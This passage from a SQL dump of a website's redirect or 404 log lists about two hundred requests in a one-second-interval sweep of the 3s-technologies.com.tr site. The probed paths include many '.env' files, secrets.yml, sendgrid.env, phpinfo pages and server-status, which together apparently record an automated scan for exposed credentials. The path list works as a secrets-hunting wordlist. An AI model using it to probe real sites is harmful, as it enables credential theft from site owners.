00:00:00',301),(62243,'https://www.3s-technologies.com.tr/en/rest.php',NULL,'','',1,0,'2026-04-12 10:41:59','0000-00-00 00:00:00',301),(62244,'https://www.3s-technologies.com.tr/en/rest/.env',NULL,'','',1,0,'2026-04-12 10:41:59','0000-00-00 00:00:00',301),(62245,'https://www.3s-technologies.com.tr/en/restapi/.env',NULL,'','',1,0,'2026-04-12 10:42:00','0000-00-00 00:00:00',301),(62246,'https://www.3s-technologies.com.tr/en/results/.env',NULL,'','',1,0,'2026-04-12 10:42:00','0000-00-00 00:00:00',301),(62247,'https://www.3s-technologies.com.tr/en/robots/.env',NULL,'','',1,0,'2026-04-12 10:42:01','0000-00-00 00:00:00',301),(62248,'https://www.3s-technologies.com.tr/en/rollup.config.js',NULL,'','',1,0,'2026-04-12 10:42:02','0000-00-00 00:00:00',301),(62249,'https://www.3s-technologies.com.tr/en/root/.env',NULL,'','',1,0,'2026-04-12 10:42:02','0000-00-00 00:00:00',301),(62250,'https://www.3s-technologies.com.tr/en/rosterback/.env',NULL,'','',1,0,'2026-04-12 10:42:02','0000-00-00 00:00:00',301),(62251,'https://www.3s-technologies.com.tr/en/roundcube/.env',NULL,'','',1,0,'2026-04-12 10:42:03','0000-00-00 00:00:00',301),(62252,'https://www.3s-technologies.com.tr/en/roundcubemail/.env',NULL,'','',1,0,'2026-04-12 10:42:03','0000-00-00 00:00:00',301),(62253,'https://www.3s-technologies.com.tr/en/routes/.env',NULL,'','',1,0,'2026-04-12 10:42:04','0000-00-00 00:00:00',301),(62254,'https://www.3s-technologies.com.tr/en/run/.env',NULL,'','',1,0,'2026-04-12 10:42:04','0000-00-00 00:00:00',301),(62255,'https://www.3s-technologies.com.tr/en/rust-backend/.env',NULL,'','',1,0,'2026-04-12 10:42:04','0000-00-00 00:00:00',301),(62256,'https://www.3s-technologies.com.tr/en/rust-backend/dao/.env',NULL,'','',1,0,'2026-04-12 10:42:05','0000-00-00 00:00:00',301),(62257,'https://www.3s-technologies.com.tr/en/s-with-me-front/.env',NULL,'','',1,0,'2026-04-12 10:42:05','0000-00-00 00:00:00',301),(62258,'https://www.3s-technologies.com.tr/en/s3.js',NULL,'','',1,0,'2026-04-12 10:42:06','0000-00-00 00:00:00',301),(62259,'https://www.3s-technologies.com.tr/en/saas/.env',NULL,'','',1,0,'2026-04-12 10:42:06','0000-00-00 00:00:00',301),(62260,'https://www.3s-technologies.com.tr/en/samples/chatroom/chatroom-spa/.env',NULL,'','',1,0,'2026-04-12 10:42:07','0000-00-00 00:00:00',301),(62261,'https://www.3s-technologies.com.tr/en/samples/docker/deploymentscripts/.env',NULL,'','',1,0,'2026-04-12 10:42:07','0000-00-00 00:00:00',301),(62262,'https://www.3s-technologies.com.tr/en/sapi/debug/default/view',NULL,'','',1,0,'2026-04-12 10:42:08','0000-00-00 00:00:00',301),(62263,'https://www.3s-technologies.com.tr/en/script/.env',NULL,'','',1,0,'2026-04-12 10:42:08','0000-00-00 00:00:00',301),(62264,'https://www.3s-technologies.com.tr/en/scripts/.env',NULL,'','',1,0,'2026-04-12 10:42:10','0000-00-00 00:00:00',301),(62265,'https://www.3s-technologies.com.tr/en/scripts/fvt/.env',NULL,'','',1,0,'2026-04-12 10:42:11','0000-00-00 00:00:00',301),(62266,'https://www.3s-technologies.com.tr/en/secrets.js',NULL,'','',1,0,'2026-04-12 10:42:12','0000-00-00 00:00:00',301),(62267,'https://www.3s-technologies.com.tr/en/secrets.yml',NULL,'','',1,0,'2026-04-12 10:42:13','0000-00-00 00:00:00',301),(62268,'https://www.3s-technologies.com.tr/en/secrets/.env',NULL,'','',1,0,'2026-04-12 10:42:13','0000-00-00 00:00:00',301),(62269,'https://www.3s-technologies.com.tr/en/selfish-darling-backend/.env',NULL,'','',1,0,'2026-04-12 10:42:14','0000-00-00 00:00:00',301),(62270,'https://www.3s-technologies.com.tr/en/sendgrid.env',NULL,'','',1,0,'2026-04-12 10:42:14','0000-00-00 00:00:00',301),(62271,'https://www.3s-technologies.com.tr/en/serve-browserbench/.env',NULL,'','',1,0,'2026-04-12 10:42:15','0000-00-00 00:00:00',301),(62272,'https://www.3s-technologies.com.tr/en/serve_time_server/.env',NULL,'','',1,0,'2026-04-12 10:42:15','0000-00-00 00:00:00',301),(62273,'https://www.3s-technologies.com.tr/en/server-status',NULL,'','',2,0,'2026-04-12 10:42:16','0000-00-00 00:00:00',301),(62274,'https://www.3s-technologies.com.tr/en/server.log',NULL,'','',1,0,'2026-04-12 10:42:16','0000-00-00 00:00:00',301),(62275,'https://www.3s-technologies.com.tr/en/server/config/.env',NULL,'','',1,0,'2026-04-12 10:42:17','0000-00-00 00:00:00',301),(62276,'https://www.3s-technologies.com.tr/en/server/laravel/.env',NULL,'','',1,0,'2026-04-12 10:42:18','0000-00-00 00:00:00',301),(62277,'https://www.3s-technologies.com.tr/en/server/s3.js',NULL,'','',1,0,'2026-04-12 10:42:18','0000-00-00 00:00:00',301),(62278,'https://www.3s-technologies.com.tr/en/server/src/persistence/.env',NULL,'','',1,0,'2026-04-12 10:42:19','0000-00-00 00:00:00',301),(62279,'https://www.3s-technologies.com.tr/en/server_with_db/.env',NULL,'','',1,0,'2026-04-12 10:42:19','0000-00-00 00:00:00',301),(62280,'https://www.3s-technologies.com.tr/en/serverless.yml',NULL,'','',1,0,'2026-04-12 10:42:20','0000-00-00 00:00:00',301),(62281,'https://www.3s-technologies.com.tr/en/service-worker.js',NULL,'','',1,0,'2026-04-12 10:42:20','0000-00-00 00:00:00',301),(62282,'https://www.3s-technologies.com.tr/en/service/.env',NULL,'','',1,0,'2026-04-12 10:42:21','0000-00-00 00:00:00',301),(62283,'https://www.3s-technologies.com.tr/en/services/.env',NULL,'','',1,0,'2026-04-12 10:42:21','0000-00-00 00:00:00',301),(62284,'https://www.3s-technologies.com.tr/en/services/adminer/.env',NULL,'','',1,0,'2026-04-12 10:42:22','0000-00-00 00:00:00',301),(62285,'https://www.3s-technologies.com.tr/en/services/deployment-agent/.env',NULL,'','',1,0,'2026-04-12 10:42:22','0000-00-00 00:00:00',301),(62286,'https://www.3s-technologies.com.tr/en/services/documents/.env',NULL,'','',1,0,'2026-04-12 10:42:23','0000-00-00 00:00:00',301),(62287,'https://www.3s-technologies.com.tr/en/services/graylog/.env',NULL,'','',1,0,'2026-04-12 10:42:23','0000-00-00 00:00:00',301),(62288,'https://www.3s-technologies.com.tr/en/services/jaeger/.env',NULL,'','',1,0,'2026-04-12 10:42:24','0000-00-00 00:00:00',301),(62289,'https://www.3s-technologies.com.tr/en/services/minio/.env',NULL,'','',1,0,'2026-04-12 10:42:24','0000-00-00 00:00:00',301),(62290,'https://www.3s-technologies.com.tr/en/services/monitoring/.env',NULL,'','',1,0,'2026-04-12 10:42:25','0000-00-00 00:00:00',301),(62291,'https://www.3s-technologies.com.tr/en/services/portainer/.env',NULL,'','',1,0,'2026-04-12 10:42:26','0000-00-00 00:00:00',301),(62292,'https://www.3s-technologies.com.tr/en/services/redis-commander/.env',NULL,'','',1,0,'2026-04-12 10:42:26','0000-00-00 00:00:00',301),(62293,'https://www.3s-technologies.com.tr/en/services/registry/.env',NULL,'','',1,0,'2026-04-12 10:42:27','0000-00-00 00:00:00',301),(62294,'https://www.3s-technologies.com.tr/en/services/simcore/.env',NULL,'','',1,0,'2026-04-12 10:42:27','0000-00-00 00:00:00',301),(62295,'https://www.3s-technologies.com.tr/en/services/traefik/.env',NULL,'','',1,0,'2026-04-12 10:42:28','0000-00-00 00:00:00',301),(62296,'https://www.3s-technologies.com.tr/en/sessions/.env',NULL,'','',1,0,'2026-04-12 10:42:28','0000-00-00 00:00:00',301),(62297,'https://www.3s-technologies.com.tr/en/settings.py',NULL,'','',1,0,'2026-04-12 10:42:29','0000-00-00 00:00:00',301),(62298,'https://www.3s-technologies.com.tr/en/shared/.env',NULL,'','',1,0,'2026-04-12 10:42:29','0000-00-00 00:00:00',301),(62299,'https://www.3s-technologies.com.tr/en/shibboleth/.env',NULL,'','',1,0,'2026-04-12 10:42:30','0000-00-00 00:00:00',301),(62300,'https://www.3s-technologies.com.tr/en/shop/.env',NULL,'','',1,0,'2026-04-12 10:42:30','0000-00-00 00:00:00',301),(62301,'https://www.3s-technologies.com.tr/en/shopware/.env',NULL,'','',1,0,'2026-04-12 10:42:31','0000-00-00 00:00:00',301),(62302,'https://www.3s-technologies.com.tr/en/simple_server/.env',NULL,'','',1,0,'2026-04-12 10:42:31','0000-00-00 00:00:00',301),(62303,'https://www.3s-technologies.com.tr/en/site-library/.env',NULL,'','',1,0,'2026-04-12 10:42:32','0000-00-00 00:00:00',301),(62304,'https://www.3s-technologies.com.tr/en/sitemaps/.env',NULL,'','',1,0,'2026-04-12 10:42:32','0000-00-00 00:00:00',301),(62305,'https://www.3s-technologies.com.tr/en/sites/.env',NULL,'','',1,0,'2026-04-12 10:42:33','0000-00-00 00:00:00',301),(62306,'https://www.3s-technologies.com.tr/en/sitestatic/.env',NULL,'','',1,0,'2026-04-12 10:42:33','0000-00-00 00:00:00',301),(62307,'https://www.3s-technologies.com.tr/en/socketio/.env',NULL,'','',1,0,'2026-04-12 10:42:34','0000-00-00 00:00:00',301),(62308,'https://www.3s-technologies.com.tr/en/source/.env',NULL,'','',1,0,'2026-04-12 10:42:34','0000-00-00 00:00:00',301),(62309,'https://www.3s-technologies.com.tr/en/sources/.env',NULL,'','',1,0,'2026-04-12 10:42:35','0000-00-00 00:00:00',301),(62310,'https://www.3s-technologies.com.tr/en/sources/api/.env',NULL,'','',1,0,'2026-04-12 10:42:35','0000-00-00 00:00:00',301),(62311,'https://www.3s-technologies.com.tr/en/spearmint/.env',NULL,'','',1,0,'2026-04-12 10:42:36','0000-00-00 00:00:00',301),(62312,'https://www.3s-technologies.com.tr/en/spikes/config-material-app/.env',NULL,'','',1,0,'2026-04-12 10:42:36','0000-00-00 00:00:00',301),(62313,'https://www.3s-technologies.com.tr/en/spotiapps/.env',NULL,'','',1,0,'2026-04-12 10:42:37','0000-00-00 00:00:00',301),(62314,'https://www.3s-technologies.com.tr/en/src/__tests__/__fixtures__/instancewithdependentsteps/.env',NULL,'','',1,0,'2026-04-12 10:42:37','0000-00-00 00:00:00',301),(62315,'https://www.3s-technologies.com.tr/en/src/__tests__/__fixtures__/typescriptintegrationproject/.env',NULL,'','',1,0,'2026-04-12 10:42:38','0000-00-00 00:00:00',301),(62316,'https://www.3s-technologies.com.tr/en/src/__tests__/__fixtures__/typescriptproject/.env',NULL,'','',1,0,'2026-04-12 10:42:38','0000-00-00 00:00:00',301),(62317,'https://www.3s-technologies.com.tr/en/src/__tests__/__fixtures__/typescriptvisualizeproject/.env',NULL,'','',1,0,'2026-04-12 10:42:39','0000-00-00 00:00:00',301),(62318,'https://www.3s-technologies.com.tr/en/src/add-auth/express/.env',NULL,'','',1,0,'2026-04-12 10:42:39','0000-00-00 00:00:00',301),(62319,'https://www.3s-technologies.com.tr/en/src/assembly/.env',NULL,'','',1,0,'2026-04-12 10:42:40','0000-00-00 00:00:00',301),(62320,'https://www.3s-technologies.com.tr/en/src/character-service/.env',NULL,'','',1,0,'2026-04-12 10:42:40','0000-00-00 00:00:00',301),(62321,'https://www.3s-technologies.com.tr/en/src/client/mobile/.env',NULL,'','',1,0,'2026-04-12 10:42:41','0000-00-00 00:00:00',301),(62322,'https://www.3s-technologies.com.tr/en/src/core/tests/dotenv-files/.env',NULL,'','',1,0,'2026-04-12 10:42:41','0000-00-00 00:00:00',301),(62323,'https://www.3s-technologies.com.tr/en/src/gameprovider-service/.env',NULL,'','',1,0,'2026-04-12 10:42:42','0000-00-00 00:00:00',301),(62324,'https://www.3s-technologies.com.tr/en/src/main/front-end/.env',NULL,'','',1,0,'2026-04-12 10:42:42','0000-00-00 00:00:00',301),(62325,'https://www.3s-technologies.com.tr/en/src/main/resources/archetype-resources/__rootartifactid__-acceptance-test/src/test/resources/app-launcher-tile/.env',NULL,'','',1,0,'2026-04-12 10:42:43','0000-00-00 00:00:00',301),(62326,'https://www.3s-technologies.com.tr/en/src/renderer/.env',NULL,'','',1,0,'2026-04-12 10:42:43','0000-00-00 00:00:00',301),(62327,'https://www.3s-technologies.com.tr/en/srv6_controller/controller/.env',NULL,'','',1,0,'2026-04-12 10:42:44','0000-00-00 00:00:00',301),(62328,'https://www.3s-technologies.com.tr/en/srv6_controller/examples/.env',NULL,'','',1,0,'2026-04-12 10:42:44','0000-00-00 00:00:00',301),(62329,'https://www.3s-technologies.com.tr/en/srv6_controller/node-manager/.env',NULL,'','',1,0,'2026-04-12 10:42:45','0000-00-00 00:00:00',301),(62330,'https://www.3s-technologies.com.tr/en/st-js-be-2020-movies-two/.env',NULL,'','',1,0,'2026-04-12 10:42:45','0000-00-00 00:00:00',301),(62331,'https://www.3s-technologies.com.tr/en/stack.json',NULL,'','',1,0,'2026-04-12 10:42:46','0000-00-00 00:00:00',301),(62332,'https://www.3s-technologies.com.tr/en/stackato-pkg/.env',NULL,'','',1,0,'2026-04-12 10:42:46','0000-00-00 00:00:00',301),(62333,'https://www.3s-technologies.com.tr/en/stag/.env',NULL,'','',1,0,'2026-04-12 10:42:46','0000-00-00 00:00:00',301),(62334,'https://www.3s-technologies.com.tr/en/staging-api',NULL,'','',1,0,'2026-04-12 10:42:47','0000-00-00 00:00:00',301),(62335,'https://www.3s-technologies.com.tr/en/staging',NULL,'','',1,0,'2026-04-12 10:42:47','0000-00-00 00:00:00',301),(62336,'https://www.3s-technologies.com.tr/en/staging/api/.env',NULL,'','',1,0,'2026-04-12 10:42:48','0000-00-00 00:00:00',301),(62337,'https://www.3s-technologies.com.tr/en/staging/backend/.env',NULL,'','',1,0,'2026-04-12 10:42:48','0000-00-00 00:00:00',301),(62338,'https://www.3s-technologies.com.tr/en/staging/frontend/.env',NULL,'','',1,0,'2026-04-12 10:42:48','0000-00-00 00:00:00',301),(62339,'https://www.3s-technologies.com.tr/en/static-collected/.env',NULL,'','',1,0,'2026-04-12 10:42:49','0000-00-00 00:00:00',301),(62340,'https://www.3s-technologies.com.tr/en/static-html/.env',NULL,'','',1,0,'2026-04-12 10:42:49','0000-00-00 00:00:00',301),(62341,'https://www.3s-technologies.com.tr/en/static-root/.env',NULL,'','',1,0,'2026-04-12 10:42:50','0000-00-00 00:00:00',301),(62342,'https://www.3s-technologies.com.tr/en/static/.env',NULL,'','',1,0,'2026-04-12 10:42:50','0000-00-00 00:00:00',301),(62343,'https://www.3s-technologies.com.tr/en/static/js/*.chunk.js',NULL,'','',1,0,'2026-04-12 10:42:51','0000-00-00 00:00:00',301),(62344,'https://www.3s-technologies.com.tr/en/static/js/main.11bc02d8.chunk.js',NULL,'','',1,0,'2026-04-12 10:42:51','0000-00-00 00:00:00',301),(62345,'https://www.3s-technologies.com.tr/en/static/js/main.1b34ee2a.js',NULL,'','',1,0,'2026-04-12 10:42:51','0000-00-00 00:00:00',301),(62346,'https://www.3s-technologies.com.tr/en/static/js/main.335d17a0.js',NULL,'','',1,0,'2026-04-12 10:42:52','0000-00-00 00:00:00',301),(62347,'https://www.3s-technologies.com.tr/en/static/js/main.36e5ec99.js',NULL,'','',1,0,'2026-04-12 10:42:52','0000-00-00 00:00:00',301),(62348,'https://www.3s-technologies.com.tr/en/static/js/main.48389ac6.js',NULL,'','',1,0,'2026-04-12 10:42:53','0000-00-00 00:00:00',301),(62349,'https://www.3s-technologies.com.tr/en/static/js/main.4aa2819f.js',NULL,'','',1,0,'2026-04-12 10:42:53','0000-00-00 00:00:00',301),(62350,'https://www.3s-technologies.com.tr/en/static/js/main.602cea98.chunk.js',NULL,'','',1,0,'2026-04-12 10:42:54','0000-00-00 00:00:00',301),(62351,'https://www.3s-technologies.com.tr/en/static/js/main.87c766e3.js',NULL,'','',1,0,'2026-04-12 10:42:54','0000-00-00 00:00:00',301),(62352,'https://www.3s-technologies.com.tr/en/static/js/main.89c971fa.js',NULL,'','',1,0,'2026-04-12 10:42:55','0000-00-00 00:00:00',301),(62353,'https://www.3s-technologies.com.tr/en/static/js/main.8c18b542.js',NULL,'','',1,0,'2026-04-12 10:42:55','0000-00-00 00:00:00',301),(62354,'https://www.3s-technologies.com.tr/en/static/js/main.bfa51071.js',NULL,'','',1,0,'2026-04-12 10:42:56','0000-00-00 00:00:00',301),(62355,'https://www.3s-technologies.com.tr/en/static/js/main.ef8ecb99.chunk.js',NULL,'','',1,0,'2026-04-12 10:42:56','0000-00-00 00:00:00',301),(62356,'https://www.3s-technologies.com.tr/en/static_prod/.env',NULL,'','',1,0,'2026-04-12 10:42:57','0000-00-00 00:00:00',301),(62357,'https://www.3s-technologies.com.tr/en/static_root/.env',NULL,'','',1,0,'2026-04-12 10:42:57','0000-00-00 00:00:00',301),(62358,'https://www.3s-technologies.com.tr/en/static_user/.env',NULL,'','',1,0,'2026-04-12 10:42:58','0000-00-00 00:00:00',301),(62359,'https://www.3s-technologies.com.tr/en/staticfiles/.env',NULL,'','',1,0,'2026-04-12 10:42:59','0000-00-00 00:00:00',301),(62360,'https://www.3s-technologies.com.tr/en/stats/.env',NULL,'','',1,0,'2026-04-12 10:42:59','0000-00-00 00:00:00',301),(62361,'https://www.3s-technologies.com.tr/en/storage/.env',NULL,'','',1,0,'2026-04-12 10:43:00','0000-00-00 00:00:00',301),(62362,'https://www.3s-technologies.com.tr/en/storage/.env.local',NULL,'','',1,0,'2026-04-12 10:43:00','0000-00-00 00:00:00',301),(62363,'https://www.3s-technologies.com.tr/en/storage/debugbar/*.json',NULL,'','',1,0,'2026-04-12 10:43:01','0000-00-00 00:00:00',301),(62364,'https://www.3s-technologies.com.tr/en/strapi/.env',NULL,'','',1,0,'2026-04-12 10:43:01','0000-00-00 00:00:00',301),(62365,'https://www.3s-technologies.com.tr/en/style/.env',NULL,'','',1,0,'2026-04-12 10:43:02','0000-00-00 00:00:00',301),(62366,'https://www.3s-technologies.com.tr/en/styles/.env',NULL,'','',1,0,'2026-04-12 10:43:02','0000-00-00 00:00:00',301),(62367,'https://www.3s-technologies.com.tr/en/stylesheets/.env',NULL,'','',1,0,'2026-04-12 10:43:03','0000-00-00 00:00:00',301),(62368,'https://www.3s-technologies.com.tr/en/swagger',NULL,'','',1,0,'2026-04-12 10:43:03','0000-00-00 00:00:00',301),(62369,'https://www.3s-technologies.com.tr/en/symfony/.env',NULL,'','',1,0,'2026-04-12 10:43:03','0000-00-00 00:00:00',301),(62370,'https://www.3s-technologies.com.tr/en/system-config/.env',NULL,'','',1,0,'2026-04-12 10:43:04','0000-00-00 00:00:00',301),(62371,'https://www.3s-technologies.com.tr/en/system/.env',NULL,'','',1,0,'2026-04-12 10:43:04','0000-00-00 00:00:00',301),(62372,'https://www.3s-technologies.com.tr/en/system/config',NULL,'','',1,0,'2026-04-12 10:43:05','0000-00-00 00:00:00',301),(62373,'https://www.3s-technologies.com.tr/en/system/phpinfo.php',NULL,'','',1,0,'2026-04-12 10:43:05','0000-00-00 00:00:00',301),(62374,'https://www.3s-technologies.com.tr/en/target/.env',NULL,'','',1,0,'2026-04-12 10:43:06','0000-00-00 00:00:00',301),(62375,'https://www.3s-technologies.com.tr/en/temanr10/.env',NULL,'','',1,0,'2026-04-12 10:43:06','0000-00-00 00:00:00',301),(62376,'https://www.3s-technologies.com.tr/en/temanr9/.env',NULL,'','',1,0,'2026-04-12 10:43:07','0000-00-00 00:00:00',301),(62377,'https://www.3s-technologies.com.tr/en/temp/.env',NULL,'','',1,0,'2026-04-12 10:43:08','0000-00-00 00:00:00',301),(62378,'https://www.3s-technologies.com.tr/en/template/.env',NULL,'','',1,0,'2026-04-12 10:43:08','0000-00-00 00:00:00',301),(62379,'https://www.3s-technologies.com.tr/en/templates/.env',NULL,'','',1,0,'2026-04-12 10:43:09','0000-00-00 00:00:00',301),(62380,'https://www.3s-technologies.com.tr/en/test-api',NULL,'','',1,0,'2026-04-12 10:43:10','0000-00-00 00:00:00',301),(62381,'https://www.3s-technologies.com.tr/en/test-network/.env',NULL,'','',1,0,'2026-04-12 10:43:10','0000-00-00 00:00:00',301),(62382,'https://www.3s-technologies.com.tr/en/test-network/addorg3/.env',NULL,'','',1,0,'2026-04-12 10:43:11','0000-00-00 00:00:00',301),(62383,'https://www.3s-technologies.com.tr/en/test/aries-js-worker/fixtures/.env',NULL,'','',1,0,'2026-04-12 10:43:12','0000-00-00 00:00:00',301),(62384,'https://www.3s-technologies.com.tr/en/test/bdd/fixtures/adapter-rest/.env',NULL,'','',1,0,'2026-04-12 10:43:13','0000-00-00 00:00:00',301),(62385,'https://www.3s-technologies.com.tr/en/test/bdd/fixtures/agent-rest/.env',NULL,'','',1,0,'2026-04-12 10:43:13','0000-00-00 00:00:00',301),(62386,'https://www.3s-technologies.com.tr/en/test/bdd/fixtures/couchdb/.env',NULL,'','',1,0,'2026-04-12 10:43:14','0000-00-00 00:00:00',301),(62387,'https://www.3s-technologies.com.tr/en/test/bdd/fixtures/demo/.env',NULL,'','',1,0,'2026-04-12 10:43:14','0000-00-00 00:00:00',301),(62388,'https://www.3s-technologies.com.tr/en/test/bdd/fixtures/demo/openapi/.env',NULL,'','',1,0,'2026-04-12 10:43:15','0000-00-00 00:00:00',301),(62389,'https://www.3s-technologies.com.tr/en/test/bdd/fixtures/did-method-rest/.env',NULL,'','',1,0,'2026-04-12 10:43:15','0000-00-00 00:00:00',301),(62390,'https://www.3s-technologies.com.tr/en/test/bdd/fixtures/did-rest/.env',NULL,'','',1,0,'2026-04-12 10:43:16','0000-00-00 00:00:00',301),(62391,'https://www.3s-technologies.com.tr/en/test/bdd/fixtures/edv-rest/.env',NULL,'','',1,0,'2026-04-12 10:43:16','0000-00-00 00:00:00',301),(62392,'https://www.3s-technologies.com.tr/en/test/bdd/fixtures/openapi-demo/.env',NULL,'','',1,0,'2026-04-12 10:43:17','0000-00-00 00:00:00',301),(62393,'https://www.3s-technologies.com.tr/en/test/bdd/fixtures/sidetree-mock/.env',NULL,'','',1,0,'2026-04-12 10:43:17','0000-00-00 00:00:00',301),(62394,'https://www.3s-technologies.com.tr/en/test/bdd/fixtures/universalresolver/.env',NULL,'','',1,0,'2026-04-12 10:43:17','0000-00-00 00:00:00',301),(62395,'https://www.3s-technologies.com.tr/en/test/bdd/fixtures/vc-rest/.env',NULL,'','',1,0,'2026-04-12 10:43:18','0000-00-00 00:00:00',301),(62396,'https://www.3s-technologies.com.tr/en/test/fixtures/.env',NULL,'','',1,0,'2026-04-12 10:43:18','0000-00-00 00:00:00',301),(62397,'https://www.3s-technologies.com.tr/en/test/fixtures/app_types/node/.env',NULL,'','',1,0,'2026-04-12 10:43:19','0000-00-00 00:00:00',301),(62398,'https://www.3s-technologies.com.tr/en/test/fixtures/app_types/rails/.env',NULL,'','',1,0,'2026-04-12 10:43:19','0000-00-00 00:00:00',301),(62399,'https://www.3s-technologies.com.tr/en/test/fixtures/node_path/.env',NULL,'','',1,0,'2026-04-12 10:43:20','0000-00-00 00:00:00',301),(62400,'https://www.3s-technologies.com.tr/en/test/integration/env-config/app/.env',NULL,'','',1,0,'2026-04-12 10:43:20','0000-00-00 00:00:00',301),(62401,'https://www.3s-technologies.com.tr/en/test0.php',NULL,'','',1,0,'2026-04-12 10:43:21','0000-00-00 00:00:00',301),(62402,'https://www.3s-technologies.com.tr/en/test1',NULL,'','',1,0,'2026-04-12 10:43:21','0000-00-00 00:00:00',301),(62403,'https://www.3s-technologies.com.tr/en/test1.php',NULL,'','',1,0,'2026-04-12 10:43:22','0000-00-00 00:00:00',301),(62404,'https://www.3s-technologies.com.tr/en/test123.php',NULL,'','',1,0,'2026-04-12 10:43:22','0000-00-00 00:00:00',301),(62405,'https://www.3s-technologies.com.tr/en/test2.php',NULL,'','',1,0,'2026-04-12 10:43:23','0000-00-00 00:00:00',301),(62406,'https://www.3s-technologies.com.tr/en/test3.php',NULL,'','',1,0,'2026-04-12 10:43:23','0000-00-00 00:00:00',301),(62407,'https://www.3s-technologies.com.tr/en/test4.php',NULL,'','',1,0,'2026-04-12 10:43:24','0000-00-00 00:00:00',301),(62408,'https://www.3s-technologies.com.tr/en/test5.php',NULL,'','',1,0,'2026-04-12 10:43:25','0000-00-00 00:00:00',301),(62409,'https://www.3s-technologies.com.tr/en/test6.php',NULL,'','',1,0,'2026-04-12 10:43:25','0000-00-00 00:00:00',301),(62410,'https://www.3s-technologies.com.tr/en/test7.php',NULL,'','',1,0,'2026-04-12 10:43:25','0000-00-00 00:00:00',301),(62411,'https://www.3s-technologies.com.tr/en/test8.php',NULL,'','',1,0,'2026-04-12 10:43:26','0000-00-00 00:00:00',301),(62412,'https://www.3s-technologies.com.tr/en/test9.php',NULL,'','',1,0,'2026-04-12 10:43:27','0000-00-00 00:00:00',301),(62413,'https://www.3s-technologies.com.tr/en/test_info.php',NULL,'','',1,0,'2026-04-12 10:43:27','0000-00-00 00:00:00',301),(62414,'https://www.3s-technologies.com.tr/en/test_info1.php',NULL,'','',1,0,'2026-04-12 10:43:28','0000-00-00 00:00:00',301),(62415,'https://www.3s-technologies.com.tr/en/test_info2.php',NULL,'','',1,0,'2026-04-12 10:43:28','0000-00-00 00:00:00',301),(62416,'https://www.3s-technologies.com.tr/en/test_info3.php',NULL,'','',1,0,'2026-04-12 10:43:29','0000-00-00 00:00:00',301),(62417,'https://www.3s-technologies.com.tr/en/test_info4.php',NULL,'','',1,0,'2026-04-12 10:43:29','0000-00-00 00:00:00',301),(62418,'https://www.3s-technologies.com.tr/en/test_info5.php',NULL,'','',1,0,'2026-04-12 10:43:30','0000-00-00 00:00:00',301),(62419,'https://www.3s-technologies.com.tr/en/test_phpinfo.php',NULL,'','',1,0,'2026-04-12 10:43:30','0000-00-00 00:00:00',301),(62420,'https://www.3s-technologies.com.tr/en/test_phpinfo1.php',NULL,'','',1,0,'2026-04-12 10:43:31','0000-00-00 00:00:00',301),(62421,'https://www.3s-technologies.com.tr/en/test_phpinfo2.php',NULL,'','',1,0,'2026-04-12 10:43:31','0000-00-00 00:00:00',301),(62422,'https://www.3s-technologies.com.tr/en/test_phpinfo3.php',NULL,'','',1,0,'2026-04-12 10:43:32','0000-00-00 00:00:00',301),(62423,'https://www.3s-technologies.com.tr/en/test_phpinfo4.php',NULL,'','',1,0,'2026-04-12 10:43:32','0000-00-00 00:00:00',301),(62424,'https://www.3s-technologies.com.tr/en/test_phpinfo5.php',NULL,'','',1,0,'2026-04-12 10:43:32','0000-00-00 00:00:00',301),(62425,'https://www.3s-technologies.com.tr/en/tester.php',NULL,'','',1,0,'2026-04-12 10:43:33','0000-00-00 00:00:00',301),(62426,'https://www.3s-technologies.com.tr/en/testfiles/.env',NULL,'','',1,0,'2026-04-12 10:43:33','0000-00-00 00:00:00',301),(62427,'https://www.3s-technologies.com.tr/en/testing.php',NULL,'','',1,0,'2026-04-12 10:43:34','0000-00-00 00:00:00',301),(62428,'https://www.3s-technologies.com.tr/en/testing',NULL,'','',1,0,'2026-04-12 10:43:34','0000-00-00 00:00:00',301),(62429,'https://www.3s-technologies.com.tr/en/testing/.env',NULL,'','',1,0,'2026-04-12 10:43:35','0000-00-00 00:00:00',301),(62430,'https://www.3s-technologies.com.tr/en/testing/docker/.env',NULL,'','',1,0,'2026-04-12 10:43:35','0000-00-00 00:00:00',301),(62431,'https://www.3s-technologies.com.tr/en/tests/.env',NULL,'','',1,0,'2026-04-12 10:43:36','0000-00-00 00:00:00',301),(62432,'https://www.3s-technologies.com.tr/en/tests/application/.env',NULL,'','',1,0,'2026-04-12 10:43:36','0000-00-00 00:00:00',301),(62433,'https://www.3s-technologies.com.tr/en/tests/default_settings/v10.0/.env',NULL,'','',1,0,'2026-04-12 10:43:37','0000-00-00 00:00:00',301),(62434,'https://www.3s-technologies.com.tr/en/tests/default_settings/v11.0/.env',NULL,'','',1,0,'2026-04-12 10:43:37','0000-00-00 00:00:00',301),(62435,'https://www.3s-technologies.com.tr/en/tests/default_settings/v12.0/.env',NULL,'','',1,0,'2026-04-12 10:43:38','0000-00-00 00:00:00',301),(62436,'https://www.3s-technologies.com.tr/en/tests/default_settings/v13.0/.env',NULL,'','',1,0,'2026-04-12 10:43:38','0000-00-00 00:00:00',301),(62437,'https://www.3s-technologies.com.tr/en/tests/default_settings/v7.0/.env',NULL,'','',1,0,'2026-04-12 10:43:39','0000-00-00 00:00:00',301),(62438,'https://www.3s-technologies.com.tr/en/tests/default_settings/v8.0/.env',NULL,'','',1,0,'2026-04-12 10:43:40','0000-00-00 00:00:00',301),(62439,'https://www.3s-technologies.com.tr/en/tests/default_settings/v9.0/.env',NULL,'','',1,0,'2026-04-12 10:43:40','0000-00-00 00:00:00',301),(62440,'https://www.3s-technologies.com.tr/en/tests/drupal-test/.env',NULL,'','',1,0,'2026-04-12 10:43:41','0000-00-00 00:00:00',301),(62441,'https://www.3s-technologies.com.tr/en/tests/integration/environment/.env',NULL,'','',1,0,'2026-04-12 10:43:41','0000-00-00 00:00:00',301),(62442,'https://www.3s-technologies.com.tr/en/tests/todo-react/.env',NULL,'','',1,0,'2026-04-12 10:43:41','0000-00-00 00:00:00',301),(62443,'https://www.3s-technologies.com.tr/en/testwork_json/.env',NULL,'','',1,0,'2026-04-12 10:43:42','0000-00-00 00:00:00',301),(62444,'https://www.3s-technologies.com.tr/en/theme/.env',NULL,'','',1,0,'2026-04-12 10:43:42','0000-00-00 00:00:00',301),(62445,'https://www.3s-technologies.com.tr/en/theme_static/.env',NULL,'','',1,0,'2026-04-12 10:43:43','0000-00-00 00:00:00',301),(62446,'https://www.3s-technologies.com.tr/en/thumb/.env',NULL,'','',1,0,'2026-04-12 10:43:43','0000-00-00 00:00:00',301),(62447,'https://www.3s-technologies.com.tr/en/thumbs/.env',NULL,'','',1,0,'2026-04-12 10:43:44','0000-00-00 